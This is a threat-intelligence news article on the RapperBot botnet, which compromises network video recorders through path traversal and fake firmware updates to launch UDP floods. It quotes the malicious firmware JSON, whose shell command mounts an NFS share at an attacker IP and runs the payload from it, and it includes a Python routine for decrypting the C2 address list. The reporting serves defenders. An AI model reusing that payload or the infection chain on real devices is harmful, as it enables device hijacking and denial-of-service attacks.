RapperBot Hijacking Devices to Launch DDoS Attack In a Split Second

Cybersecurity researchers began detecting an alarming surge in early April 2025 in UDP flood traffic emanating from compromised network video recorders (NVRs) and other edge devices.

Within milliseconds of infection, these devices were weaponized to direct overwhelming volumes of packets at unsuspecting targets, leading to service disruptions and massive bandwidth consumption.

Bitsight analysts identified this activity as the work of a novel botnet they dubbed RapperBot, noting its unusually rapid kill chain and innovative use of legacy hardware constraints to evade detection.

The malware’s emergence follows a familiar pattern: threat actors scan the Internet for exposed web interfaces, brute-force or exploit default credentials, and deliver a malicious payload disguised as a firmware update.

Once executed, RapperBot immediately begins two distinct actions: encrypted DNS TXT record queries to obtain command-and-control (C2) IP addresses, and continuous UDP floods on port 80.

Impact assessments show individual device throughput exceeding 1 Gbps, with aggregated botnet capacity peaking at over 7 Tbps during coordinated campaigns against major targets, including cloud-based search providers and social media platforms.

Despite its potency, the malware’s behavior is elegantly simple: it mounts a remote NFS share to fetch and execute architecture-specific binaries, then self-deletes to run entirely in memory.

Bitsight researchers noted this strategy leverages the minimal BusyBox environment on many IoT devices, where standard download tools like curl or /dev/tcp are absent.

By exploiting the NVR’s firmware update mechanism—specifically, a path traversal zero-day in the web server followed by a binary fetch over NFS—RapperBot avoids the usual filesystem artifacts that trigger antivirus alerts.

Firmware Update JSON Payload (Source – Bitsight)

Under the hood, RapperBot’s C2 discovery mechanism relies on encrypted TXT records hosted on OpenNIC domains such as iranistrash.libre and pool.rentcheapcars.sbs.

The malware constructs one of 32 predetermined hostnames by selecting randomly from hardcoded subdomain, domain, and TLD lists, then resolves these names against custom DNS servers (1.1.1.1, 8.8.8.8, and others).

The TXT response contains a pipe-separated list of encrypted IP addresses, which the bot decrypts with a custom RC4-like algorithm followed by base-56 decoding.

A Python snippet illustrating the decryption stages appears below:-

# Stage 1: Key Scheduling Algorithm (KSA-like)
S = list(range(56))
key = (first_byte_index + second_byte_index * 56)
for i in range(55, 0, -1):
    key = (0x41C64E6D * key + 0x3039) & 0xFFFFFFFF
    j = key % (i + 1)
    S[i], S[j] = S[j], S[i]

# Stage 2: Keystream-based XOR decryption
keystream = bytearray()
i = j = 0
for b in encrypted_payload[2:]:
    i = (i + 1) % 56
    j = (j + S[i]) % 56
    S[i], S[j] = S[j], S[i]
    keystream. Append(S[(S[i] + S[j]) % 56] ^ b)

# Stage 3: Base-56 decoding to obtain plaintext IP list
plaintext = base56_decode(keystream)
print(plaintext)  # e.g., b"194.226.121.51|188.92.28.62|..."

Infection Mechanism

RapperBot’s infection vector capitalizes on the administrative port (TCP 34567) of vulnerable NVRs.

Upon identifying an exposed device, the attacker exploits a path traversal flaw to download account configuration files, revealing both hashed and plaintext credentials.

With these credentials, the attacker initiates a fake firmware update, sending a ZIP-formatted payload over the proprietary update protocol.

The ZIP archive contains a simple InstallDesc JSON instructing the device to mount 104.194.9.127:/nfs and execute the payload script:-

{
  "UpgradeCommand": [
    {
      "Command": "Shell",
      "Script": "cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;"
    }
  ]
}

This approach cleverly bypasses the NVR’s BusyBox limitations—no wget, curl, or / dev/tcp—by using NFS, a protocol universally supported even on minimal embedded Linux systems.

The script iterates through multiple ARM architecture binaries until successful, writes a marker file .r, then cleans up, leaving no on-disk executable.

The immediate execution from mounted memory significantly reduces forensic footprint and enables the split-second transition from benign device to active DDoS participant.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.